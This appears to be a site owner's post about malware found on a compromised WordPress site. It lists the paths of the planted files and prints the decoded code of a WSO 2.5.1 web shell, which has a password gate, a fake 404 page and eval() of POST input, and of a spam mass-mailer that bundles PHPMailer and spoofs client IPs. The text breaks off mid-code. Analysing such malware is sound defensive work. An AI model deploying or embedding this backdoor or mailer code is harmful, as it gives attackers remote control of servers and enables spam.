Ok, I found a suspicious file on another website and it’s a shell backdoor.
/wp-content/backup-2365b/.title14.php
/wp-content/uploads/wysija/themes/rss.lib.php
/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/nextgen_gallery_display/static/fontawesome/admin38.php
this is original content:
and
And this is the unencrypted content:
$auth_pass = "f4eeb83f67a86ea7baaaac13bebe6417";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5.1');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
header('HTTP/1.0 404 Not Found');
die("404");
}
function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
function actionRC() {
if(!@$_POST['p1']) {
$a = array(
"uname" => php_uname(),
"php_version" => phpversion(),
"wso_version" => WSO_VERSION,
"safemode" => @ini_get('safe_mode')
);
echo serialize($a);
} else {
eval($_POST['p1']);
}
}
if( empty($_POST['a']) )
if(isset($default_action) && function_exists('action' . $default_action))
$_POST['a'] = $default_action;
else
$_POST['a'] = 'SecInfo';
if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
call_user_func('action' . $_POST['a']);
exit;
Another bad file is:
/wp-content/themes/Avada/framework/plugins/envato-wordpress-toolkit-library/object.php
once unencrypted we found a mass mailer!
if(isset($_SERVER))
{
$_SERVER['PHP_SELF'] = "/";
$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
}
}
if(isset($_FILES))
{
foreach($_FILES as $key => $file)
{
if(!strpos($file['name'], ".jpg"))
{
$filename = alter_macros($file['name']);
$filename = num_macros($filename);
$filename = xnum_macros($filename);
$_FILES[$key]["name"] = $filename;
}
}
}
function custom_strip_tags($text)
{
$text = strip_tags($text, '');
$text = str_replace("", "", $text);
$text = str_replace("\">", " ] ", $text);
return $text;
}
function is_ip($str) {
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
}
function from_host($content)
{
$host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']);
if (is_ip($host))
{
return $content;
}
$tokens = explode("@", $content);
$content = $tokens[0] . "@" . $host . ">";
return $content;
}
function alter_macros($content)
{
preg_match_all('#{(.*)}#Ui', $content, $matches);
for($i = 0; $i < count($matches[1]); $i++)
{
$ns = explode("|", $matches[1][$i]);
$c2 = count($ns);
$rand = rand(0, ($c2 - 1));
$content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
}
return $content;
}
function xnum_macros($content)
{
preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$num = $matches[1][$i];
$min = pow(10, $num - 1);
$max = pow(10, $num) - 1;
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
function num_macros($content)
{
preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++) { $min = $matches[1][$i]; $max = $matches[2][$i]; $rand = rand($min, $max); $content = str_replace($matches[0][$i], $rand, $content); } return $content; } function fteil_macros($content, $fteil) { return str_replace("[FTEIL]", $fteil, $content); } class PHPMailer { public $Version = '5.2.9'; public $Priority = 3; public $CharSet = 'iso-8859-1'; public $ContentType = 'text/plain'; public $Encoding = '8bit'; public $ErrorInfo = ''; public $From = 'root@localhost'; public $FromName = 'Root User'; public $Sender = ''; public $ReturnPath = ''; public $Subject = ''; public $Body = ''; public $AltBody = ''; public $Ical = ''; protected $MIMEBody = ''; protected $MIMEHeader = ''; protected $mailHeader = ''; public $WordWrap = 0; public $Mailer = 'mail'; public $Sendmail = '/usr/sbin/sendmail'; public $UseSendmailOptions = true; public $PluginDir = ''; public $ConfirmReadingTo = ''; public $Hostname = ''; public $MessageID = ''; public $MessageDate = ''; public $Host = 'localhost'; public $Port = 25; public $Helo = ''; public $SMTPSecure = ''; public $SMTPAuth = false; public $Username = ''; public $Password = ''; public $AuthType = ''; public $Realm = ''; public $Workstation = ''; public $Timeout = 300; public $SMTPDebug = 0; public $Debugoutput = 'echo'; public $SMTPKeepAlive = false; public $SingleTo = false; public $SingleToArray = array(); public $do_verp = false; public $AllowEmpty = false; public $LE = "\n"; public $DKIM_selector = ''; public $DKIM_identity = ''; public $DKIM_passphrase = ''; public $DKIM_domain = ''; public $DKIM_private = ''; public $action_function = ''; public $XMailer = ''; protected $smtp = null; protected $to = array(); protected $cc = array(); protected $bcc = array(); protected $ReplyTo = array(); protected $all_recipients = array(); protected $attachment = array(); protected $CustomHeader = array(); protected $lastMessageID = ''; protected $message_type = ''; protected $boundary = array(); protected $language = array(); protected $error_count = 0; protected $sign_cert_file = ''; protected $sign_key_file = ''; protected $sign_key_pass = ''; protected $exceptions = false; const STOP_MESSAGE = 0; const STOP_CONTINUE = 1; const STOP_CRITICAL = 2; const CRLF = "\r\n"; public function __construct($exceptions = false) { $this->exceptions = (boolean)$exceptions;
}
public function __destruct()
{
}
private function mailPassthru($to, $subject, $body, $header, $params)
{
//Check overloading of mail function to avoid double-encoding
if (ini_get('mbstring.func_overload') & 1) {
$subject = $this->secureHeader($subject);
} else {
$subject = $this->encodeHeader($this->secureHeader($subject));
}
if (ini_get('safe_mode') || !($this->UseSendmailOptions)) {
$result = @mail($to, $subject, $body, $header);
} else {
$result = @mail($to, $subject, $body, $header, $params);
}
return $result;
}
protected function edebug($str)
{
if ($this->SMTPDebug <= 0) { return; } //Avoid clash with built-in function names if (!in_array($this->Debugoutput, array('error_log', 'html', 'echo')) and is_callable($this->Debugoutput)) {
call_user_func($this->Debugoutput, $str, $this->SMTPDebug);
return;
}
switch ($this->Debugoutput) {
case 'error_log':
//Don't output, just log
error_log($str);
break;
case 'html':
//Cleans up output a bit for a better looking, HTML-safe output
echo htmlentities(
preg_replace('/[\r\n]+/', '', $str),
ENT_QUOTES,
'UTF-8'
)
. "
\n";
break;
case 'echo':
default:
//Normalize line breaks
$str = preg_replace('/(\r\n|\r|\n)/ms', "\n", $str);
echo gmdate('Y-m-d H:i:s') . "\t" . str_replace(
"\n",
"\n \t ",
trim($str)
) . "\n";
}
}
public function isHTML($isHtml = true)
{
if ($isHtml) {
$this->ContentType = 'text/html';
} else {
$this->ContentType = 'text/plain';
}
}
public function isSMTP()
{
$this->Mailer = 'smtp';
}
public function isMail()
{
$this->Mailer = 'mail';
}
public function isSendmail()
{
$ini_sendmail_path = ini_get('sendmail_path');
if (!stristr($ini_sendmail_path, 'sendmail')) {
$this->Sendmail = '/usr/sbin/sendmail';
} else {
$this->Sendmail = $ini_sendmail_path;
}
$this->Mailer = 'sendmail';
}
public function isQmail()
{
$ini_sendmail_path = ini_get('sendmail_path');
if (!stristr($ini_sendmail_path, 'qmail')) {
$this->Sendmail = '/var/qmail/bin/qmail-inject';
} else {
$this->Sendmail = $ini_sendmail_path;
}
$this->Mailer = 'qmail';
}
public function addAddress($address, $name = '')
{
return $this->addAnAddress('to', $address, $name);
}
public function addCC($address, $name = '')
{
return $this->addAnAddress('cc', $address, $name);
}
public function addBCC($address, $name = '')
{
return $this->addAnAddress('bcc', $address, $name);
}
public function addReplyTo($address, $name = '')
{
return $this->addAnAddress('Reply-To', $address, $name);
}
protected function addAnAddress($kind, $address, $name = '')
{
if (!preg_match('/^(to|cc|bcc|Reply-To)$/', $kind)) {
$this->setError($this->lang('Invalid recipient array') . ': ' . $kind);
$this->edebug($this->lang('Invalid recipient array') . ': ' . $kind);
if ($this->exceptions) {
throw new phpmailerException('Invalid recipient array: ' . $kind);
}
return false;
}
$address = trim($address);
$name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
if (!$this->validateAddress($address)) {
$this->setError($this->lang('invalid_address') . ': ' . $address);
$this->edebug($this->lang('invalid_address') . ': ' . $address);
if ($this->exceptions) {
throw new phpmailerException($this->lang('invalid_address') . ': ' . $address);
}
return false;
}
if ($kind != 'Reply-To') {
if (!isset($this->all_recipients[strtolower($address)])) {
array_push($this->$kind, array($address, $name));
$this->all_recipients[strtolower($address)] = true;
return true;
}
} else {
if (!array_key_exists(strtolower($address), $this->ReplyTo)) {
$this->ReplyTo[strtolower($address)] = array($address, $name);
return true;
}
}
return false;
}
public function setFrom($address, $name = '', $auto = true)
{
$address = trim($address);
$name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim
if (!$this->validateAddress($address)) {
$this->setError($this->lang('invalid_address') . ': ' . $address);
$this->edebug($this->lang('invalid_address') . ': ' . $address);
if ($this->exceptions) {
throw new phpmailerException($this->lang('invalid_address') . ': ' . $address);
}
return false;
}
$this->From = $address;
$this->FromName = $name;
if ($auto) {
if (empty($this->Sender)) {
$this->Sender = $address;
}
}
return true;
}
public function getLastMessageID()
{
return $this->lastMessageID;
}
public static function validateAddress($address, $patternselect = 'auto')
{
if (!$patternselect or $patternselect == 'auto') {
//Check this constant first so it works when extension_loaded() is disabled by safe mode
//Constant was added in PHP 5.2.4
if (defined('PCRE_VERSION')) {
//This pattern can get stuck in a recursive loop in PCRE <= 8.0.2 if (version_compare(PCRE_VERSION, '8.0.3') >= 0) {
$patternselect = 'pcre8';
} else {
$patternselect = 'pcre';
}
} elseif (function_exists('extension_loaded') and extension_loaded('pcre')) {
//Fall back to older PCRE
$patternselect = 'pcre';
} else {
//Filter_var appeared in PHP 5.2.0 and does not require the PCRE extension
if (version_compare(PHP_VERSION, '5.2.0') >= 0) {
$patternselect = 'php';
} else {
$patternselect = 'noregex';
}
}
}
switch ($patternselect) {
case 'pcre8':
return (boolean)preg_match(
'/^(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){65,}@)' .
'((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)' .
'(?>[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' .
'([!#-\'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' .
'(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)' .
'(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}' .
'|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:' .
'|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
'|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD',
$address
);
case 'pcre':
//An older regex that doesn't need a recent PCRE
return (boolean)preg_match(
'/^(?!(?>"?(?>\\\[ -~]|[^"])"?){255,})(?!(?>"?(?>\\\[ -~]|[^"])"?){65,}@)(?>' .
'[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*")' .
'(?>\.(?>[!#-\'*+\/-9=?^-~-]+|"(?>(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\xFF]))*"))*' .
'@(?>(?![a-z0-9-]{64,})(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)(?>\.(?![a-z0-9-]{64,})' .
'(?>[a-z0-9](?>[a-z0-9-]*[a-z0-9])?)){0,126}|\[(?:(?>IPv6:(?>(?>[a-f0-9]{1,4})(?>:' .
'[a-f0-9]{1,4}){7}|(?!(?:.*[a-f0-9][:\]]){8,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?' .
'::(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,6})?))|(?>(?>IPv6:(?>[a-f0-9]{1,4}(?>:' .
'[a-f0-9]{1,4}){5}:|(?!(?:.*[a-f0-9]:){6,})(?>[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4})?' .
'::(?>(?:[a-f0-9]{1,4}(?>:[a-f0-9]{1,4}){0,4}):)?))?(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}' .
'|[1-9]?[0-9])(?>\.(?>25[0-5]|2[0-4][0-9]|1[0-9]{2}|[1-9]?[0-9])){3}))\])$/isD',
$address
);
case 'html5':
return (boolean)preg_match(
'/^[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' .
'[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD',
$address
);
case 'noregex':
return (strlen($address) >= 3
and strpos($address, '@') >= 1
and strpos($address, '@') != strlen($address) - 1);
case 'php':
default:
return (boolean)filter_var($address, FILTER_VALIDATE_EMAIL);
}
}
public function send()
{
try {
if (!$this->preSend()) {
return false;
}
return $this->postSend();
} catch (phpmailerException $exc) {
$this->mailHeader = '';
$this->setError($exc->getMessage());
if ($this->exceptions) {
throw $exc;
}
return false;
}
}
public function preSend()
{
try {
$this->mailHeader = '';
if ((count($this->to) + count($this->cc) + count($this->bcc)) < 1) { throw new phpmailerException($this->lang('provide_address'), self::STOP_CRITICAL);
}
// Set whether the message is multipart/alternative
if (!empty($this->AltBody)) {
$this->ContentType = 'multipart/alternative';
}
$this->error_count = 0; // reset errors
$this->setMessageType();
// Refuse to send an empty message unless we are specifically allowing it
if (!$this->AllowEmpty and empty($this->Body)) {
throw new phpmailerException($this->lang('empty_message'), self::STOP_CRITICAL);
}
$this->MIMEHeader = $this->createHeader();
$this->MIMEBody = $this->createBody();
if ($this->Mailer == 'mail') {
if (count($this->to) > 0) {
$this->mailHeader .= $this->addrAppend('To', $this->to);
} else {
$this->mailHeader .= $this->headerLine('To', 'undisclosed-recipients:;');
}
$this->mailHeader .= $this->headerLine(
'Subject',
$this->encodeHeader($this->secureHeader(trim($this->Subject)))
);
}
// Sign with DKIM if enabled
if (!empty($this->DKIM_domain)
&& !empty($this->DKIM_private)
&& !empty($this->DKIM_selector)
&& file_exists($this->DKIM_private)) {
$header_dkim = $this->DKIM_Add(
$this->MIMEHeader . $this->mailHeader,
$this->encodeHeader($this->secureHeader($this->Subject)),
$this->MIMEBody
);
$this->MIMEHeader = rtrim($this->MIMEHeader, "\r\n ") . self::CRLF .
str_replace("\r\n", "\n", $header_dkim) . self::CRLF;
}
return true;
} catch (phpmailerException $exc) {
$this->setError($exc->getMessage());
if ($this->exceptions) {
throw $exc;
}
return false;
}
}
public function postSend()
{
try {
// Choose the mailer and send through it
switch ($this->Mailer) {
case 'sendmail':
case 'qmail':
return $this->sendmailSend($this->MIMEHeader, $this->MIMEBody);
case 'mail':
return $this->mailSend($this->MIMEHeader, $this->MIMEBody);
default:
$sendMethod = $this->Mailer.'Send';
if (method_exists($this, $sendMethod)) {
return $this->$sendMethod($this->MIMEHeader, $this->MIMEBody);
}
return $this->mailSend($this->MIMEHeader, $this->MIMEBody);
}
} catch (phpmailerException $exc) {
$this->setError($exc->getMessage());
$this->edebug($exc->getMessage());
if ($this->exceptions) {
throw $exc;
}
}
return false;
}
protected function sendmailSend($header, $body)
{
if ($this->Sender != '') {
if ($this->Mailer == 'qmail') {
$sendmail = sprintf('%s -f%s', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
} else {
$sendmail = sprintf('%s -oi -f%s -t', escapeshellcmd($this->Sendmail), escapeshellarg($this->Sender));
}
} else {
if ($this->Mailer == 'qmail') {
$sendmail = sprintf('%s', escapeshellcmd($this->Sendmail));
} else {
$sendmail = sprintf('%s -oi -t', escapeshellcmd($this->Sendmail));
}
}
if ($this->SingleTo) {
foreach ($this->SingleToArray as $toAddr) {
if (!@$mail = popen($sendmail, 'w')) {
throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
}
fputs($mail, 'To: ' . $toAddr . "\n");
fputs($mail, $header);
fputs($mail, $body);
$result = pclose($mail);
$this->doCallback(
($result == 0),
array($toAddr),
$this->cc,
$this->bcc,
$this->Subject,
$body,
$this->From
);
if ($result != 0) {
throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
}
}
} else {
if (!@$mail = popen($sendmail, 'w')) {
throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
}
fputs($mail, $header);
fputs($mail, $body);
$result = pclose($mail);
$this->doCallback(($result == 0), $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
if ($result != 0) {
throw new phpmailerException($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL);
}
}
return true;
}
protected function mailSend($header, $body)
{
$toArr = array();
foreach ($this->to as $toaddr) {
$toArr[] = $this->addrFormat($toaddr);
}
$to = implode(', ', $toArr);
if (empty($this->Sender)) {
$params = ' ';
} else {
$params = sprintf('-f%s', $this->Sender);
}
if ($this->Sender != '' and !ini_get('safe_mode')) {
$old_from = ini_get('sendmail_from');
ini_set('sendmail_from', $this->Sender);
}
$result = false;
if ($this->SingleTo && count($toArr) > 1) {
foreach ($toArr as $toAddr) {
$result = $this->mailPassthru($toAddr, $this->Subject, $body, $header, $params);
$this->doCallback($result, array($toAddr), $this->cc, $this->bcc, $this->Subject, $body, $this->From);
}
} else {
$result = $this->mailPassthru($to, $this->Subject, $body, $header, $params);
$this->doCallback($result, $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From);
}
if (isset($old_from)) {
ini_set('sendmail_from', $old_from);
}
if (!$result) {
throw new phpmailerException($this->lang('instantiate'), self::STOP_CRITICAL);
}
return true;
}
public function setLanguage($langcode = 'en', $lang_path = '')
{
// Define full set of translatable strings in English
$PHPMAILER_LANG = array(
'authenticate' => 'SMTP Error: Could not authenticate.',
'connect_host' => 'SMTP Error: Could not connect to SMTP host.',
'data_not_accepted' => 'SMTP Error: data not accepted.',
'empty_message' => 'Message body empty',
'encoding' => 'Unknown encoding: ',
'execute' => 'Could not execute: ',
'file_access' => 'Could not access file: ',
'file_open' => 'File Error: Could not open file: ',
'from_failed' => 'The following From address failed: ',
'instantiate' => 'Could not instantiate mail function.',
'invalid_address' => 'Invalid address',
'mailer_not_supported' => ' mailer is not supported.',
'provide_address' => 'You must provide at least one recipient email address.',
'recipients_failed' => 'SMTP Error: The following recipients failed: ',
'signing' => 'Signing Error: ',
'smtp_connect_failed' => 'SMTP connect() failed.',
'smtp_error' => 'SMTP server error: ',
'variable_set' => 'Cannot set or reset variable: '
);
if (empty($lang_path)) {
// Calculate an absolute path so it can work if CWD is not here
$lang_path = dirname(__FILE__). DIRECTORY_SEPARATOR . 'language'. DIRECTORY_SEPARATOR;
}
$foundlang = true;
$lang_file = $lang_path . 'phpmailer.lang-' . $langcode . '.php';
if ($langcode != 'en') { // There is no English translation file
// Make sure language file path is readable
if (!is_readable($lang_file)) {
$foundlang = false;
} else {
$foundlang = include $lang_file;
}
}
$this->language = $PHPMAILER_LANG;
return (boolean)$foundlang; // Returns false if language not found
}
public function getTranslations()
{
return $this->language;
}
public function addrAppend($type, $addr)
{
$addresses = array();
foreach ($addr as $address) {
$addresses[] = $this->addrFormat($address);
}
return $type . ': ' . implode(', ', $addresses) . $this->LE;
}
public function addrFormat($addr)
{
if (empty($addr[1])) { // No name provided
return $this->secureHeader($addr[0]);
} else {
return $this->encodeHeader($this->secureHeader($addr[1]), 'phrase') . ' <' . $this->secureHeader(
$addr[0]
) . '>';
}
}
public function wrapText($message, $length, $qp_mode = false)
{
$soft_break = ($qp_mode) ? sprintf(' =%s', $this->LE) : $this->LE;
$is_utf8 = (strtolower($this->CharSet) == 'utf-8');
$lelen = strlen($this->LE);
$crlflen = strlen(self::CRLF);
$message = $this->fixEOL($message);
if (substr($message, -$lelen) == $this->LE) {
$message = substr($message, 0, -$lelen);
}
$line = explode($this->LE, $message); // Magic. We know fixEOL uses $LE
$message = '';
for ($i = 0; $i < count($line); $i++) {
$line_part = explode(' ', $line[$i]);
$buf = '';
for ($e = 0; $e < count($line_part); $e++) { $word = $line_part[$e]; if ($qp_mode and (strlen($word) > $length)) {
$space_left = $length - strlen($buf) - $crlflen;
if ($e != 0) {
if ($space_left > 20) {
$len = $space_left;
if ($is_utf8) {
$len = $this->utf8CharBoundary($word, $len);
} elseif (substr($word, $len - 1, 1) == '=') {
$len--;
} elseif (substr($word, $len - 2, 1) == '=') {
$len -= 2;
}
$part = substr($word, 0, $len);
$word = substr($word, $len);
$buf .= ' ' . $part;
$message .= $buf . sprintf('=%s', self::CRLF);
} else {
$message .= $buf . $soft_break;
}
$buf = '';
}
while (strlen($word) > 0) {
if ($length <= 0) { break; } $len = $length; if ($is_utf8) { $len = $this->utf8CharBoundary($word, $len);
} elseif (substr($word, $len - 1, 1) == '=') {
$len--;
} elseif (substr($word, $len - 2, 1) == '=') {
$len -= 2;
}
$part = substr($word, 0, $len);
$word = substr($word, $len);
if (strlen($word) > 0) {
$message .= $part . sprintf('=%s', self::CRLF);
} else {
$buf = $part;
}
}
} else {
$buf_o = $buf;
$buf .= ($e == 0) ? $word : (' ' . $word);
if (strlen($buf) > $length and $buf_o != '') {
$message .= $buf_o . $soft_break;
$buf = $word;
}
}
}
$message .= $buf . self::CRLF;
}
return $message;
}
public function utf8CharBoundary($encodedText, $maxLength)
{
$foundSplitPos = false;
$lookBack = 3;
while (!$foundSplitPos) {
$lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack);
$encodedCharPos = strpos($lastChunk, '=');
if (false !== $encodedCharPos) {
// Found start of encoded character byte within $lookBack block.
// Check the encoded byte value (the 2 chars after the '=')
$hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2);
$dec = hexdec($hex);
if ($dec < 128) { // Single byte character. // If the encoded char was found at pos 0, it will fit // otherwise reduce maxLength to start of the encoded char $maxLength = ($encodedCharPos == 0) ? $maxLength : $maxLength - ($lookBack - $encodedCharPos); $foundSplitPos = true; } elseif ($dec >= 192) { // First byte of a multi byte character
// Reduce maxLength to split at start of character
$maxLength = $maxLength - ($lookBack - $encodedCharPos);
$foundSplitPos = true;
} elseif ($dec < 192) { // Middle byte of a multi byte character, look further back $lookBack += 3; } } else { // No encoded character found $foundSplitPos = true; } } return $maxLength; } public function setWordWrap() { if ($this->WordWrap < 1) { return; } switch ($this->message_type) {
case 'alt':
case 'alt_inline':
case 'alt_attach':
case 'alt_inline_attach':
$this->AltBody = $this->wrapText($this->AltBody, $this->WordWrap);
break;
default:
$this->Body = $this->wrapText($this->Body, $this->WordWrap);
break;
}
}
public function createHeader()
{
$result = '';
// Set the boundaries
$uniq_id = md5(uniqid(time()));
$this->boundary[1] = 'b1_' . $uniq_id;
$this->boundary[2] = 'b2_' . $uniq_id;
$this->boundary[3] = 'b3_' . $uniq_id;
if ($this->MessageDate == '') {
$this->MessageDate = self::rfcDate();
}
$result .= $this->headerLine('Date', $this->MessageDate);
// To be created automatically by mail()
if ($this->SingleTo) {
if ($this->Mailer != 'mail') {
foreach ($this->to as $toaddr) {
$this->SingleToArray[] = $this->addrFormat($toaddr);
}
}
} else {
if (count($this->to) > 0) {
if ($this->Mailer != 'mail') {
$result .= $this->addrAppend('To', $this->to);
}
} elseif (count($this->cc) == 0) {
$result .= $this->headerLine('To', 'undisclosed-recipients:;');
}
}
$result .= $this->addrAppend('From', array(array(trim($this->From), $this->FromName)));
// sendmail and mail() extract Cc from the header before sending
if (count($this->cc) > 0) {
$result .= $this->addrAppend('Cc', $this->cc);
}
// sendmail and mail() extract Bcc from the header before sending
if ((
$this->Mailer == 'sendmail' or $this->Mailer == 'qmail' or $this->Mailer == 'mail'
)
and count($this->bcc) > 0
) {
$result .= $this->addrAppend('Bcc', $this->bcc);
}
if (count($this->ReplyTo) > 0) {
$result .= $this->addrAppend('Reply-To', $this->ReplyTo);
}
// mail() sets the subject itself
if ($this->Mailer != 'mail') {
$result .= $this->headerLine('Subject', $this->encodeHeader($this->secureHeader($this->Subject)));
}
if ($this->MessageID != '') {
$this->lastMessageID = $this->MessageID;
} else {
$this->lastMessageID = sprintf('<%s@%s>', $uniq_id, $this->ServerHostname());
}
$result .= $this->HeaderLine('Message-ID', $this->lastMessageID);
$result .= $this->headerLine('X-Priority', $this->Priority);
if ($this->XMailer == '') {
$result .= $this->headerLine(
'X-Mailer',
'PHPMailer ' . $this->Version . ' (https://github.com/PHPMailer/PHPMailer/)'
);
} else {
$myXmailer = trim($this->XMailer);
if ($myXmailer) {
$result .= $this->headerLine('X-Mailer', $myXmailer);
}
}
if ($this->ConfirmReadingTo != '') {
$result .= $this->headerLine('Disposition-Notification-To', '<' . trim($this->ConfirmReadingTo) . '>');
}
// Add custom headers
for ($index = 0; $index < count($this->CustomHeader); $index++) {
$result .= $this->headerLine(
trim($this->CustomHeader[$index][0]),
$this->encodeHeader(trim($this->CustomHeader[$index][1]))
);
}
if (!$this->sign_key_file) {
$result .= $this->headerLine('MIME-Version', '1.0');
$result .= $this->getMailMIME();
}
return $result;
}
public function getMailMIME()
{
$result = '';
$ismultipart = true;
switch ($this->message_type) {
case 'inline':
$result .= $this->headerLine('Content-Type', 'multipart/related;');
$result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
break;
case 'attach':
case 'inline_attach':
case 'alt_attach':
case 'alt_inline_attach':
$result .= $this->headerLine('Content-Type', 'multipart/mixed;');
$result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
break;
case 'alt':
case 'alt_inline':
$result .= $this->headerLine('Content-Type', 'multipart/alternative;');
$result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"');
break;
default:
// Catches case 'plain': and case '':
$result .= $this->textLine('Content-Type: ' . $this->ContentType . '; charset=' . $this->CharSet);
$ismultipart = false;
break;
}
// RFC1341 part 5 says 7bit is assumed if not specified
if ($this->Encoding != '7bit') {
// RFC 2045 section 6.4 says multipart MIME parts may only use 7bit, 8bit or binary CTE
if ($ismultipart) {
if ($this->Encoding == '8bit') {
$result .= $this->headerLine('Content-Transfer-Encoding', '8bit');
}
// The only remaining alternatives are quoted-printable and base64, which are both 7bit compatible
} else {
$result .= $this->headerLine('Content-Transfer-Encoding', $this->Encoding);
}
}
if ($this->Mailer != 'mail') {
$result .= $this->LE;
}
return $result;
}
public function getSentMIMEMessage()
{
return $this->MIMEHeader . $this->mailHeader . self::CRLF . $this->MIMEBody;
}
public function createBody()
{
$body = '';
if ($this->sign_key_file) {
$body .= $this->getMailMIME() . $this->LE;
}
$this->setWordWrap();
$bodyEncoding = $this->Encoding;
$bodyCharSet = $this->CharSet;
if ($bodyEncoding == '8bit' and !$this->has8bitChars($this->Body)) {
$bodyEncoding = '7bit';
$bodyCharSet = 'us-ascii';
}
$altBodyEncoding = $this->Encoding;
$altBodyCharSet = $this->CharSet;
if ($altBodyEncoding == '8bit' and !$this->has8bitChars($this->AltBody)) {
$altBodyEncoding = '7bit';
$altBodyCharSet = 'us-ascii';
}
switch ($this->message_type) {
case 'inline':
$body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding);
$body .= $this->encodeString($this->Body, $bodyEncoding);
$body .= $this->LE . $this->LE;
$body .= $this->attachAll('inline', $this->boundary[1]);
break;
case 'attach':
$body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding);
$body .= $this->encodeString($this->Body, $bodyEncoding);
$body .= $this->LE . $this->LE;
$body .= $this->attachAll('attachment', $this->boundary[1]);
break;
case 'inline_attach':
$body .= $this->textLine('--' . $this->boundary[1]);
$body .= $this->headerLine('Content-Type', 'multipart/related;');
$body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"');
$body .= $this->LE;
$body .= $this->getBoundary($this->boundary[2], $bodyCharSet, '', $bodyEncoding);
$body .= $this->encodeString($this->Body, $bodyEncoding);
$body .= $this->LE . $this->LE;
$body .= $this->attachAll('inline', $this->boundary[2]);
$body .= $this->LE;
$body .= $this->attachAll('attachment', $this->boundary[1]);
break;
case 'alt':
$body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding);
$body .= $this->encodeString($this->AltBody, $altBodyEncoding);
$body .= $this->LE . $this->LE;
$body .= $this->getBoundary($this->boundary[1], $bodyCharSet, 'text/html', $bodyEncoding);
$body .= $this->encodeString($this->Body, $bodyEncoding);
$body .= $this->LE . $this->LE;
if (!empty($this->Ical)) {
